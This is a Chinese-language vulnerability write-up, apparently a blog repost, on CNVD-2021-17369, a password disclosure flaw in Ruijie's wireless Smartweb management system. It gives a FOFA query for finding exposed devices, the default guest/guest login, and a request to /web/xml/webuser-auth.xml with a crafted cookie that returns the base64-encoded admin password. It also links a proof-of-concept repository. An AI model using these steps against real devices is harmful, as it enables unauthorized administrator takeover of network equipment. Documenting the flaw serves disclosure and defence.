锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)

  • A+
所属分类:代码审计

锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)



:漏洞描述🐑


锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。


二:  漏洞影响🐇


锐捷网络股份有限公司 无线smartweb管理系统


三:  漏洞复现🐋

FOFA: title="无线smartWeb--登录页面"

登录页面如下

锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)


然后找到了一个设备存在管理admin员的弱口令,进去后发现Web CLI控制台

翻文件的过程中发现一个文件很有意思,运行命令查看

more /web/xml/webuser-auth.xml

锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)


里面存在所有人的账号密码

默认存在 guest账户,账号密码为 guest/guest

其中登录的过程中搜索admin的数据后发现请求了一个文件 /web/xml/webuser-auth.xml,而且响应中包含了 admin密码的base64加密

锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)

解密就可以获得 admin管理员的密码,尝试直接请求

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Cookie添加Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)





 四:  Goby & POC🦉

已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中Ruijie_smartweb_password_information_disclosure


锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)


锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)



 五:  关于文库🦉



在线文库:

http://wiki.peiqi.tech


Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC


最后

下面就是文库和团队的公众号啦,更新的文章都会在第一时间推送在交流群和公众号,想要投稿的加我一起建设文库~

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐



同时知识星球也开放运营啦,希望师傅们支持支持啦🐟

知识星球里会持续发布一些漏洞公开信息和技术文章~


锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)

锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)


锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)


本文始发于微信公众号(PeiQi文库):锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 (1day~)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: